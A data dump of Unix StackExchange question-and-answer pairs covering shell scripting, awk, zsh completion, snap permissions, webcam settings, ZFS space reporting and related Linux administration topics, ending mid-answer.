source_id
int64
1
74.7M
question
stringlengths
0
40.2k
response
stringlengths
0
111k
metadata
dict
580,276
With sudden working from home, video conferencing is all the rage, and many of the more fun features are only built-in to the Windows clients, such as background blur, changing background images, filters, turning yourself into a potato, etc. I realize it's not exactly business critical, but it adds to the camaraderie, and I've been feeling left out. How can I add some features like this to my Linux system? Note, I don't have the option of changing clients/services. I'm looking for a solution that creates some sort of virtual camera device I can select from any conferencing application.
I have made a Linux package, weffe, for some basic video effects using ffmpeg on Linux webcams here: https://github.com/intermezzio/weffe . You can add a foreground image (like a frame), add top and bottom meme text, or stream a prerecorded video to a webcam, and use a couple of other features. It's very fast because it's written 100% in the shell, without any additional programming languages. However, if you're looking for something with more features, here are a couple of programs you can consider (including those from rriemann's comment): Avatarify : make yourself talk with a fake image (like Mona Lisa) and words will come out of its mouth (using Python + Tensorflow, can be run on the cloud with CoLab) Pyfakewebcam : Python library for writing videos to a fake webcam device Linux Fake Background Webcam : Use a virtual background on Linux (written in Python + OpenCV) Open Source Virtual Background : Another virtual background program (also written in Python + OpenCV)
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/580276", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/1069/" ] }
580,357
I got a new drive and I can copy files fine with simple cp on the drive. However for some weird reason I get Permission denied with ffmpeg. Permissions seem fine unless I'm missing something > ll /media/manos/6TB/drwxrwxrwx 13 manos 4096 Apr 16 00:56 ./drwxr-x---+ 6 manos 4096 Apr 16 00:49 ..-rwxrwxrwx 1 manos 250900209 Apr 15 17:28 test.mp4*.. But ffmpeg keeps complaing > ffmpeg -i test.mp4 test.movffmpeg version n4.1.4 Copyright (c) 2000-2019 the FFmpeg developers built with gcc 7 (Ubuntu 7.4.0-1ubuntu1~18.04.1) configuration: --prefix= --prefix=/usr --disable-debug --disable-doc --disable-static --enable-avisynth --enable-cuda --enable-cuvid --enable-libdrm --enable-ffplay --enable-gnutls --enable-gpl --enable-libass --enable-libfdk-aac --enable-libfontconfig --enable-libfreetype --enable-libmp3lame --enable-libopencore_amrnb --enable-libopencore_amrwb --enable-libopus --enable-libpulse --enable-sdl2 --enable-libspeex --enable-libtheora --enable-libtwolame --enable-libv4l2 --enable-libvorbis --enable-libvpx --enable-libx264 --enable-libx265 --enable-libxcb --enable-libxvid --enable-nonfree --enable-nvenc --enable-omx --enable-openal --enable-opencl --enable-runtime-cpudetect --enable-shared --enable-vaapi --enable-vdpau --enable-version3 --enable-xlib libavutil 56. 22.100 / 56. 22.100 libavcodec 58. 35.100 / 58. 35.100 libavformat 58. 20.100 / 58. 20.100 libavdevice 58. 5.100 / 58. 5.100 libavfilter 7. 40.101 / 7. 40.101 libswscale 5. 3.100 / 5. 3.100 libswresample 3. 3.100 / 3. 3.100 libpostproc 55. 3.100 / 55. 3.100test.mp4: Permission denied Simply copying like below works fine.. > cp test.mp4 test.mp4.bak'test.mp4' -> 'test.mp4.bak' Any ideas on what is going on? This is pretty annoying. Note ffmpeg is installed at /snap/bin/ffmpeg
So after a lot of digging I figured the issue is with snap package manager. Apparently by default, snap can't access the media directory so we need to manually fix this. Check if ffmpeg has access to removable-media like below > snap connections | grep ffmpegdesktop ffmpeg:desktop :desktop -home ffmpeg:home :home -network ffmpeg:network :network -network-bind ffmpeg:network-bind :network-bind -opengl ffmpeg:opengl :opengl -optical-drive ffmpeg:optical-drive :optical-drive -pulseaudio ffmpeg:pulseaudio :pulseaudio -wayland ffmpeg:wayland :wayland -x11 ffmpeg:x11 :x11 - Add that permission if it's missing sudo snap connect ffmpeg:removable-media
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/580357", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/12217/" ] }
580,575
Let's say I have two bash scripts: Provider.sh , which performs some process and needs to "expose" MAP , but not A or B : #!/bin/bashdeclare -A MAPA=helloB=worldMAP[hello]=world Consumer.sh , which executes Provider.sh and needs to use MAP . #!/bin/bashsource ./Provider.shecho ${MAP[hello]} # >>> world In order to declutter the environment as much as possible, I want as little as possible in Provider.sh to be visible to Consumer.sh . How can make it so that only MAP is "sourced".
It is possible to scope variables using functions. Example: ## Provider.sh# Global varsdeclare -A map# Wrap the rest of Provider.sh in a functionprovider() { # Local vars only available in this function declare a=hello b=world c d # Global vars are available map[hello]=world}provider "$@" # Execute function, pass on any positional parameters# Remove functionunset -f provider $ cat Consumer.sh. ./Provider.shecho "${map[hello]}"echo "$a" $ bash -x Consumer.sh+ . ./Provider.sh++ declare -A map++ provider++ declare a=hello b=world c d++ map[hello]=world++ unset -f provider+ echo worldworld+ echo ''
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/580575", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/406806/" ] }
580,715
I want to copy some files from root directory ( /var/log/ ) to home directory( home/test/copyfromlogs/ ) and after that i want to remove those files from root directory. The files I want to copy are situated under /var/log/ . The root directory is filling up so I want to remove the following files from there. . btmp-20200401 >> 894M ; secure-20200322 >> 187M ; secure-20200329 >> 235M ; secure-20200405 >> 180M ; secure-20200412 >> 119M I have created directory under home to have a backup of those file so that i need them just incase. The full path of the new directory is '/home/test/copyoflogfiles/' I am new learner. I want to ask If the following command is correct if I want to copy btmp-20200401 from /var/log to /home/test/copyoflogfiles/ . If not what will be the correct command cp /var/log/btmp-20200401 /home/test/copyoflogfiles/ What will be my current directory when I will perform the copy command? Suppose I am inside /home/test/copyoflogfiles/ . In that case will the command be different? Can you please tell me what is the command for deleting single file from the directory . I want to remove the file btmp-20200401 from /var/log/ after copying that file Kind regards
Question 1: your command is correct: cp /var/log/btmp-20200401 /home/test/copyoflogfiles/ If you do not have the file system privileges to copy the file, then the sudo command can be used to elevate your permissions, for example: sudo cp /var/log/btmp-20200401 /home/test/copyoflogfiles/ Question 2: You can use the cp command from any directory to any other directory if you are using full paths so you could run that command in any other directory. Question 3: rm /var/log/btmp-20200401 Would remove that file, to be sure you could use rm -i filename which will prompt you for the correct file. However it might be better to use the mv command rather than cp followed by rm So your command would change to: mv /var/log/btmp-20200401 /home/test/copyoflogfiles/ Which would move the file rather than a copy and delete.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/580715", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/392731/" ] }
580,732
I have a file like this: head 1kG_MDS6.bim1 rs2073813 0 753541 A G1 rs60320384 0 769223 G C1 rs59066358 0 771967 A G... I would like to concatenate 1st,4th,6th and 5th column (in that order) separated by ":" so the output would look like this: 1:753541:G:A1:769223:C:G1:771967:G:A I tried this: awk ' { print $1 $4 $6 $5 ":" $NF } ' 1kG_MDS6.bim > 1kG_MDS6_SNPs1.txt but it concateneated with ":" just the last two columns
Use an output field separator. awk 'BEGIN{OFS=":"} {print $1,$4,$6,$5}' file Output: 1:753541:G:A1:769223:C:G1:771967:G:A
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/580732", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/401868/" ] }
581,058
I'm running BOINC on my old netbook, which only has 2 GB of RAM onboard, which isn't enough for some tasks to run. As in, they refuse to, seeing how low on RAM the device is. I have zRAM with backing_dev and zstd algorithm enabled, so in reality, lack of memory is never an issue, and in especially tough cases I can always just use systemd-run --scope -p (I have successfully ran programs that demanded +16 GB of RAM using this) How can I make BOINC think that my laptop has more than 2 GB of RAM installed, so that I could run those demanding tasks?
Create a fake meminfo and mount it over an original /proc/meminfo : $ mkdir fake-meminfo && cd fake-meminfo$ cp /proc/meminfo .$ chmod +w meminfo$ sed -Ei 's,^MemTotal: [0-9]+ kB,MemTotal: 8839012 kB,' meminfo # replace 8839012 with an amount of RAM you want to pretend you have$ free -m # check how much RAM you have now total used free shared buff/cache availableMem: 7655 1586 3770 200 2298 5373$ sudo mount --bind meminfo /proc/meminfo $ free -m # check how much RAM you pretend to have after replacing /proc/meminfo total used free shared buff/cache availableMem: 8631 2531 3800 201 2299 5403$ sudo umount /proc/meminfo # restore an original /proc/meminfo$ free -m total used free shared buff/cache availableMem: 7655 1549 3806 200 2299 5410 You can also run the above commands in a mount namespace isolated fromthe rest of the system. References: Recover from faking /proc/meminfo
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/581058", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/405442/" ] }
581,144
Bash 4.3 shell on Linux Mint: I realize the Bash shell is type-less, or has a very weak form of typing. But can the Bash shell be invoked (e.g. with some option) such that the shell will throw a run time error when a declared integer variable is misused (e.g. by attempting to store a string into that integer variable)? Example code: declare -i ageage=23echo "$age" # result is 23age="hello"echo "$age" # result is not the string hello - wish I could get an error message here!```
The way to throw an error is: set -u# orset -o nounset Then: $ set -u$ declare -i age$ age=hellobash: hello: unbound variable However it won't always "work" the way you expect if it's not an unbound variable: $ hello=world$ age=hellobash: world: unbound variable$ hello=42$ age=hello$ echo $age42$ hello=""$ age=hello$ echo $age0 I've come to think there's very little value in declare -i . It lets you do arithmetic without arithmetic syntax, and I think that just adds a layer of confusion.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581144", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/139928/" ] }
581,284
How to install Microsoft Teams via pacman for arch linux? Microsoft Teams is also available for linux. I have problems to get an easy installation for arch. Teams is not listed in official package manager for pacman? I found only DEB and RPM for official download packages from Microsoft: https://products.office.com/en-us/microsoft-teams/download-app
a) using makepg and install package Clone teams arch git repository (PKGBUILD) git clone https://aur.archlinux.org/teams.git . Build package using makepkg and install using -si option makepkg -si See also: https://aur.archlinux.org/packages/teams/ b) alternatively use yay as package manager to easy install aur packages if yay not installed git clone https://aur.archlinux.org/yay.gitcd yaymakepkg -si Use yay to install aur package yay -S teams
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/581284", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/364144/" ] }
581,290
I have a bunch of files like this: hhsLog.8020.20200330}1585594173}0}coll_DefaultCollectorGroup_1_158594166_132642}1036942}0}0 I just want to keep the first 20 characters and add a .txt extension. So in the end I should have a file with the name: hhsLog.8020.20200330.txt I am working on both Fedora and Solaris.
You can easily do this with a shell loop in bash : cd /path/to/files/;for file in *; do echo mv -i -- "$file" "${file:0:20}.txt"done Once you are satisfied that does what you need, remove the echo to actually rename the files: cd /path/to/files/; for file in *; do mv -i -- "$file" "${file:0:20}.txt"done The -i will make mv ask before overwriting if one of the new names already exists.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581290", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/407515/" ] }
581,388
I have a file like this: head logistic_results.assoc_3.logistic CHR SNP BP A1 TEST NMISS OR STAT P 2 2:129412140:T:C 129412140 C ADD 1438 1.523 3.89 0.0001004 15 15:26411414:G:A 26411414 A ADD 1438 0.5577 -3.889 0.0001005 7 7:24286442:T:G 24286442 G ADD 1438 0.7449 -3.889 0.0001007 7 7:24286638:G:C 24286638 C ADD 1438 0.7449 -3.889 0.0001007 2 2:129403636:T:C 129403636 C ADD 1438 1.741 3.889 0.0001008 15 15:70363332:A:G 70363332 G ADD 1438 1.366 3.886 0.000102 3 3:13698784:G:A 13698784 A ADD 1438 1.465 3.884 0.0001028 3 3:32665882:C:A 32665882 A ADD 1438 1.54 3.883 0.000103 12 12:32855080:A:G 32855080 G ADD 1438 4.013 3.883 0.0001031 How do I extract all lines which have 3 in the first column? I tried this but I got empty file... grep '^3' logistic_results.assoc_3.logistic > logistic_results.assoc_3.logistic_chr3awk '/^3/' logistic_results.assoc_3.logistic > logistic_results.assoc_3.logistic_chr3 For this example the result would be this: 3 3:13698784:G:A 13698784 A ADD 1438 1.465 3.884 0.0001028 3 3:32665882:C:A 32665882 A ADD 1438 1.54 3.883 0.000103
Compare the first non-whitespace field with the string 3 : awk '$1 == "3"' logistic_results.assoc_3.logistic >logistic_results.assoc_3.logistic_chr3 The issue with your commands is that you're expecting the 3 to be the first character on the line, but judging from your sample data, there may be whitespace in front of the number. Using awk with its default field delimiter would place the chromosome name in $1 regardless of leading whitespace characters. This would also be safer as $1 == "1" would only be true for chromosome 1, whereas a regular expression matching 1 at the start of the field (e.g. with /^[[:blank:]]*1/ or $1 ~ /^1/ ) would also match e.g. 11 and 12 .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581388", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/401868/" ] }
581,507
What is the difference between this redirection some-program &> some_file and this one? some-program > some_file 2>&1
In the bash and zsh shells, there is no difference between the two. The &>file redirection is syntactic sugar implemented as an extension to the POSIX standard that means exactly the same thing as the standard >file 2>&1 . Note that using the &> redirection in a script executed by a non- bash / zsh interpreter will likely break your script in interesting ways, as & and > would be interpreted independently of each other. some_command &>file would, in a non -bash / zsh script, be the same as some_command & >file and as some_command &>file This starts some_command as a background job, and truncates/creates the file called file . Also related: What are the shell's control and redirection operators?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581507", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/270159/" ] }
581,545
I understand these: true; echo "$?" # 0false; echo "$?" # 1true | echo "$?" # 0 But not this: false | echo "$?" # 0 ...Why doesn't it print 1 ? And how could I force a failure in a pipe, and get 1 thereafter?
The result of both true | echo "$?" and false | echo "$?" is misleading. The content of "$?" will be set before piping the command false to the command echo . To execute these lines, bash sets up a pipeline of commands. The pipeline is setup, then the commands started in parallel. So in your example: true; echo "$?" # 0false; echo "$?" # 1true | echo "$?" # 0 is the same as: true echo "$?" # 0false echo "$?" # 1echo "$?" # 0 true is not executed before echo $? it is executed at the same time.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/581545", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/291147/" ] }
581,571
I have Debian 10 and installed wine5 using: sudo apt install --install-recommends winehq-stable I get these errors when I try to run Notepad++: 0009:fixme:font:get_outline_text_metrics failed to read full_nameW for font L"Ani"!0009:fixme:win:LockWindowUpdate (0x1004e), partial stub!0009:fixme:imm:ImmReleaseContext (000100F0, 0110C888): stub0009:fixme:win:LockWindowUpdate ((nil)), partial stub!0009:fixme:msg:ChangeWindowMessageFilterEx 0x1004e 4a 1 (nil)0009:fixme:win:LockWindowUpdate (0x1004e), partial stub!0009:fixme:win:LockWindowUpdate ((nil)), partial stub!0009:fixme:ver:GetCurrentPackageId (0x32fe94 (nil)): stub I think I need to install something else, but I don't know what. sudo apt list --installed | grep wine shows fonts-wine/stable,stable,now 4.0-2 all [installed]wine-stable-amd64/unknown,now 5.0.0~buster amd64 [installed,automatic]wine-stable-i386/unknown,now 5.0.0~buster i386 [installed,automatic]wine-stable/unknown,now 5.0.0~buster amd64 [installed,automatic]winehq-stable/unknown,now 5.0.0~buster amd64 [installed] wine version: wine --versionwine-5.0 If I run winecfg, I get: wine: Read access denied for device L"\\??\\Z:\\", FS volume label and serial are not available.
The result of both true | echo "$?" and false | echo "$?" is misleading. The content of "$?" will be set before piping the command false to the command echo . To execute these lines, bash sets up a pipeline of commands. The pipeline is setup, then the commands started in parallel. So in your example: true; echo "$?" # 0false; echo "$?" # 1true | echo "$?" # 0 is the same as: true echo "$?" # 0false echo "$?" # 1echo "$?" # 0 true is not executed before echo $? it is executed at the same time.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/581571", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/82788/" ] }
581,632
I'm learning to write zsh completion scripts and while reading the documentation for _arguments I found this part: n:message:action n::message:action This describes the n’th normal argument. The message will be printed above the matches generated and the action indicates [...] Where is that message printed? I'm trying with the following minimal function but I can't figure it out. Do I need to enable something in my shell? function _test { _arguments '-a' '-b[description]:my message:(x y)'} $ compdef _test program This results in: $ program -b <tab>x y
It's in the manual if you know where to look, but the way it's explained, you practically have to know the answer to understand what the manual is saying. _arguments calls this a “message” and the manual says that this “describes”. So you take a leap of faith — or read the source code of _arguments and puzzle out that this message is passed to _describe . The documentation of this function states that The descr is taken as a string to display above the matches if the format style for the descriptions tag is set. A style is something you configure with zstyle . The section “Completion System Configuration” documents the format of styles for completion: The fields are always in the order :completion:function:completer:command:argument:tag . So you need to call zstyle ':completion:*:*:*:*:descriptions' format= SOMETHING . Or replace the * by something else if you only want to do it in certain contexts. The documentation of the descriptions tag is not particularly helpful at this stage, but the documentation of the format style is: If this is set for the descriptions tag, its value is used as a string to display above matches in completion lists. The sequence %d in this string will be replaced with a short description of what these matches are. This string may also contain the output attribute sequences understood by compadd -X See the compadd documentation which in turns refers to prompt expansion; you can mainly use visual effects . So run zstyle ':completion:*:*:*:*:descriptions' format '%F{green}%d%f' and you'll see that message in green above the completions. Or zstyle ':completion:*:*:program:*:descriptions' format '%F{green}%d%f' if you only want it to apply when completing arguments of program .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581632", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/7004/" ] }
581,763
Here is an example where backticks and $() behave differently: $ echo "$(echo \"test\")""test"$ echo "`echo \"test\"`"test My understanding was this is because "backslashes (\) inside backticks are handled in a non-obvious manner" But it seems like this is something else because when I remove outer double quotes the results became similar: $ echo $(echo \"test\")"test"$ echo `echo \"test\"`"test" Could someone explain me how it works and why "`echo \"test\"`" removes double quotes?
You are right, it is something else in this case. The solution is still in the same link , but the second point: Nested quoting inside $() is far more convenient. [...] `...` requires backslashes around the internal quotes in order to be portable. Thus, echo "`echo \"test\"`" does not equal this: echo "$(echo \"test\")" but this: echo "$(echo "test")" You need to compare it instead with this: echo "`echo \\"test\\"`"
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581763", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/6988/" ] }
581,801
I am currently running a statistical modelling script that performs a phylogenetic ANOVA. The script runs fine when I analyse the full dataset. But when I take a subset it starts analysing but quickly terminates with segmentation fault. I cannot really figure out by googling if this could be due to a problem from my side (e.g. sample dataset to small for the analysis) and/or bug in the script or if this has something to do with my linux system. I read it has to do with writing data to the memory, but than why is everything fine with a larger dataset? I tried to find more information using google, but this made it more complicated. Thanks for clarifying in advance!
(tl;dr: It's almost certainly a bug in your program or a library it uses.) A segmentation fault indicates that a memory access was not legal. That is, based on the issued request, the CPU issues a page fault because the page requested either isn't resident or has permissions that are incongruous with the request. After that, the kernel checks to see whether it simply doesn't know anything about this page, whether it's just not in memory yet and it should put it there, or whether it needs to perform some special handling (for example, copy-on-write pages are read-only, and this valid page fault may indicate we should copy it and update the permissions). See Wikipedia for minor vs. major (e.g. demand paging ) vs. invalid page faults. Getting a segmentation fault indicates the invalid case: the page is not only not in memory, but the kernel also doesn't have any remediative actions to perform because the process doesn't logically have that page of its virtual address space mapped. As such, this almost certainly indicates a bug in either the program or one of its underlying libraries -- for example, attempting to read or write into memory which is not valid for the process. If the address had happened to be valid, it could have caused stack corruption or scribbled over other data, but reading or writing an un mapped page is caught by hardware. The reason why it works with your larger dataset and not your smaller dataset is entirely specific to that program: it's probably a bug in that program's logic, which is only tripped for the smaller dataset for some reason (for example, your dataset may have a field representing the total number of entries, and if it's not updated, your program may blindly read into unallocated memory if it doesn't do other sanity checks). It's several orders of magnitude less likely than simply being a software bug, but a segmentation fault may also be an indicator of hardware issues, like faulty memory, a faulty CPU, or your hardware tripping over errata (as an example, see here ). Getting segfaults due to failing hardware often results in sometimes-works behaviour, although a bad bit in physical RAM might get mapped the same way in repeated runs of a program if you don't run anything else in between. You can mostly rule out this possibility by booting memtest86+ to check for failing RAM, and using software like Prime95 to stress-test your CPU (including the FP math FMA execution units). You can run the program in a debugger like gdb and get the backtrace at the time of the segmentation fault, which will likely indicate the culprit: % gdb --args ./foo --bar --baz(gdb) r # run the program[...wait for segfault...](gdb) bt # get the backtrace for the current thread
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/581801", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/403558/" ] }
581,867
I'm using a Logitech C720 webcam with my PC, which runs Devuan Beowulf GNU/Linux (~= Debian 10 Buster but without systemd). In a related, but not Linux-specific, question on SuperUser , it turns out that I need to change my webcam's power line frequency setting. However - I have no idea how to do that. My desktop environment, Cinnamon, does not have an item in the "System Settings" dialog for it. How do I make this setting, then?
On the command line, you can set the uvcvideo driver's power line frequency setting to the 50 Hz value with: v4l2-ctl --set-ctrl=power_line_frequency=1 If your webcam is not /dev/video0 , add a -d /dev/videoN option with the correct number. The v4l2-ctl command comes in package v4l-utils , at least on Debian and related distributions. Also, v4l2-ctl -L will display a list of settings available in your webcam. It will also describe the available choices for settings like power line frequency. Your webcam may have a list of available settings that is different from mine. To make the power line frequency setting persistent, you might want to make an udev rule of it. To do that, create a file named /etc/udev/rules.d/81-uvcvideo.rules with the following contents: # Set power line frequency to EuropeanACTION=="add", SUBSYSTEM=="video4linux", DRIVERS=="uvcvideo", RUN+="/usr/bin/v4l2-ctl --set-ctrl=power_line_frequency=1"
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581867", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/34868/" ] }
581,878
i've been taking some tome to learn more about Linux, and i've chosen Debian buster as mais main 'lab'. One think to highlit is: its a debian vm on Oracle virtual box. The problem is: i want to work with an static ip, but though ive configured everything accordingly to my network parameter, the if won't come up. (check journalctl -xe, and it brings a failure message) Check it bellow: I'm using Oracle vbox with the network set as 'bridge'. Under dhcp it works just fine. Some help would be much appreciated. Regards.
On the command line, you can set the uvcvideo driver's power line frequency setting to the 50 Hz value with: v4l2-ctl --set-ctrl=power_line_frequency=1 If your webcam is not /dev/video0 , add a -d /dev/videoN option with the correct number. The v4l2-ctl command comes in package v4l-utils , at least on Debian and related distributions. Also, v4l2-ctl -L will display a list of settings available in your webcam. It will also describe the available choices for settings like power line frequency. Your webcam may have a list of available settings that is different from mine. To make the power line frequency setting persistent, you might want to make an udev rule of it. To do that, create a file named /etc/udev/rules.d/81-uvcvideo.rules with the following contents: # Set power line frequency to EuropeanACTION=="add", SUBSYSTEM=="video4linux", DRIVERS=="uvcvideo", RUN+="/usr/bin/v4l2-ctl --set-ctrl=power_line_frequency=1"
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581878", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408100/" ] }
581,883
I have a following Makefile : $ cat Makefileall: foofoo: bar @truebar: file.txt touch file.txtfile.txt: @echo 'Created file.txt'run: @echo 'Target without dependency.'$ When I execute make , then touch file.txt is always executed even when it already exists. Why is that so? I expected bar target not to run if dependency is met, i.e file.txt exists.In addition, am I correct that make by default picks the first target of the Makefile which is named all in my example?
On the command line, you can set the uvcvideo driver's power line frequency setting to the 50 Hz value with: v4l2-ctl --set-ctrl=power_line_frequency=1 If your webcam is not /dev/video0 , add a -d /dev/videoN option with the correct number. The v4l2-ctl command comes in package v4l-utils , at least on Debian and related distributions. Also, v4l2-ctl -L will display a list of settings available in your webcam. It will also describe the available choices for settings like power line frequency. Your webcam may have a list of available settings that is different from mine. To make the power line frequency setting persistent, you might want to make an udev rule of it. To do that, create a file named /etc/udev/rules.d/81-uvcvideo.rules with the following contents: # Set power line frequency to EuropeanACTION=="add", SUBSYSTEM=="video4linux", DRIVERS=="uvcvideo", RUN+="/usr/bin/v4l2-ctl --set-ctrl=power_line_frequency=1"
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/581883", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/33060/" ] }
582,005
If I use zpool to list the available space, it tells me I have over 270 GB free, yet the actual free space available (and shown by df and zfs list ) is only a mere 40 GB, almost ten times less: $ zpool listNAME SIZE ALLOC FREE CKPOINT EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOTssdtank 7.25T 6.98T 273G - - 21% 96% 1.00x ONLINE -$ zpool iostat -v capacity operations bandwidth pool alloc free read write read write---------------------------------- ----- ----- ----- ----- ----- -----ssdtank 6.98T 273G 1 15 365K 861K ata-Samsung_SSD_860_QVO_4TB_S123 3.49T 136G 0 7 182K 428K ata-Samsung_SSD_860_QVO_4TB_S456 3.49T 137G 0 8 183K 434K$ zfs listNAME USED AVAIL REFER MOUNTPOINTssdtank 6.98T 40.6G 32K /srv/tank What does this discrepancy mean? Why do the two utilities show differing amounts of free space? More importantly, how can I access the "extra" 200 GB if it's really there? The pool is made of two identical disks, no RAID or other setups, just added as plain vdevs to the pool and the filesystem created on top. (There are multiple filesystems inside the root one shown, but I don't think they are relevant because they all share the same root and have the same 40.6G free space). As requested, here is the output of zfs get all : (I also updated the figures above so they all make sense as the amount of free disk space has changed today. The old figures were 257GB/27GB and today they are 273GB/40GB, which means the amount of disk space freed up since I originally posted the question has increased both figures by the same amount - i.e. zpool seems to be reporting approx 270 GB more than everything else, but it's consistently 270 GB more than whatever the actual free space happens to be at the time). NAME PROPERTY VALUE SOURCEssdtank aclinherit restricted defaultssdtank acltype off defaultssdtank atime off receivedssdtank available 40.6G -ssdtank canmount on defaultssdtank casesensitivity sensitive -ssdtank checksum on defaultssdtank compression off defaultssdtank compressratio 1.00x -ssdtank context none defaultssdtank copies 1 defaultssdtank createtxg 1 -ssdtank creation Sat Oct 26 21:53 2019 -ssdtank dedup off defaultssdtank defcontext none defaultssdtank devices on defaultssdtank dnodesize legacy defaultssdtank encryption off defaultssdtank exec on defaultssdtank filesystem_count none defaultssdtank filesystem_limit none defaultssdtank fscontext none defaultssdtank guid 12757787786185470931 -ssdtank keyformat none defaultssdtank keylocation none defaultssdtank logbias latency defaultssdtank logicalreferenced 16K -ssdtank logicalused 6.98T -ssdtank mlslabel none defaultssdtank mounted yes -ssdtank mountpoint /srv/tank localssdtank nbmand off defaultssdtank normalization none -ssdtank objsetid 54 -ssdtank overlay off defaultssdtank pbkdf2iters 0 defaultssdtank primarycache all defaultssdtank quota none defaultssdtank readonly off defaultssdtank recordsize 128K defaultssdtank redundant_metadata all defaultssdtank refcompressratio 1.00x -ssdtank referenced 32K -ssdtank refquota none defaultssdtank refreservation none defaultssdtank relatime off defaultssdtank reservation none defaultssdtank rootcontext none defaultssdtank secondarycache all defaultssdtank setuid on defaultssdtank sharenfs [email protected]/24 receivedssdtank sharesmb off defaultssdtank snapdev hidden defaultssdtank snapdir hidden defaultssdtank snapshot_count none defaultssdtank snapshot_limit none defaultssdtank special_small_blocks 0 defaultssdtank sync standard defaultssdtank type filesystem -ssdtank used 6.98T -ssdtank usedbychildren 6.98T -ssdtank usedbydataset 32K -ssdtank usedbyrefreservation 0B -ssdtank usedbysnapshots 0B -ssdtank utf8only off -ssdtank version 5 -ssdtank volmode default defaultssdtank vscan off defaultssdtank written 0 -ssdtank xattr on defaultssdtank zoned off default
Internally ZFS reserves a small amount of space (slop space) to ensure some critical ZFS operations can complete even in situations with very low free space. The amount is 3.2% of total pool capacity. zfs-0.6.5 3.2% of 7.25T = 235GB You really only have 40.6GB free in the filesystem. zpool reports about the raw disk capacities and the free space will be 40 + 235 = 275G
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582005", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/6662/" ] }
582,024
When running a script with some lines not too important for the script to finish, how do I cancel a specific command without killing the entire script? Normally I would invoke Ctrl + c , but when I do that with that script, the entire script ends prematurely. Is there a way (e.g. options placed inside the script) to allow Ctrl + c just for the command at hand? A bit of a background:I have my ~/.bash_profile to run ssh-add as part of it, but if I cancel it, I would like to get the echo lines following the "error 130" of ssh-add being shown to remind me to run it manually before any connection.
I think you are looking for traps: trap terminate_foo SIGINTterminate_foo() { echo "foo terminated" bar}foo() { while :; do echo foo sleep 1 done}bar() { while :; do echo bar sleep 1 done}foo Output: ./foofoofoofoo^C foo terminated # here ctrl+c pressedbarbar... Function foo is executed until Ctrl + C is pressed, and then continues the execution, in this case the function bar .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582024", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/179000/" ] }
582,041
While tracking down an error in my shellscript, I found the following behavior in this code snippet: declare -a filelistreadarray filelist < <(ls -A)readonly filelistfor file in "${filelist[@]}"; do sha256sum ${filelist[$file]} | head -c 64done When the array filelist is not in double quotes, the command succeeds. I've been using ShellCheck to try to improve my coding, which recommends- Double quote to prevent globbing and word splitting. I'm not worried about word splitting in this case, but in a lot of other cases I am, so I'm trying to keep my code consistent. However, when I double quote the array, the command fails. Simplifying the code to a single element gives the following: bash-5.0# sha256sum ${filelist[0]} | head -c 64e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855bash-5.0# sha256sum "${filelist[0]}" | head -c 64sha256sum: can't open 'file1': No such file or directory I can obviously just... not double quote because in this instance word splitting isn't a concern. But I wanted to post because in the future it might be. My question has two parts: Is there a "best-practices" way to prevent word splitting other than double quoting the array as above? Where are the single quotes coming from in the array? Edit: there are no single quotes. The single quotes are the error showing the name of the file that cannot be opened. Also, just out of curiosity, why does echo ${filelist[0]} not contain an additional newline but echo "${filelist[0]}" does?
There is absolutely no problem with quoting an array expansion. And, of course, there is no problem with no quoting it either as long as you know and accept the consequences. Any non-quoted expansion is subject to splitting and globbing. And, in your code, the ${filelist[…]} is subject to IFS character removal (and splitting if the string contains any <space> , <tab> , or <newline> ). That is what having the expansion un-quoted do, remove trailing <newline> . What creates this problem is that you are using readarray without removing the trailing delimiter from each array element. Doing that keeps a trailing <newline> that is reflected on the error message. What you could have used is: readarray -t filelist < <(ls -A) The -t option will remove all the trailing newlines of each file name. -t Remove a trailing delim (default newline) from each line read. But your code has some additional issues. There is no need to declare or empty the array filelist . It gets done by default by readarray. It needs to be done in some other cases. There is no need to parse the output of ls , in fact, that is a bad idea. The easiest way to get a list of files in an array is simply: filelist=( ./* ) And, to make it even better, it would be a good idea to avoid directories: for file in ./*; do [[ -f $file ]] && filelist+=( "$file" )done In the loop, the value of the var $file is what should be used: for file in "${filelist[@]}"; do sha256sum "$file" | head -c 64done Unless you use for file in 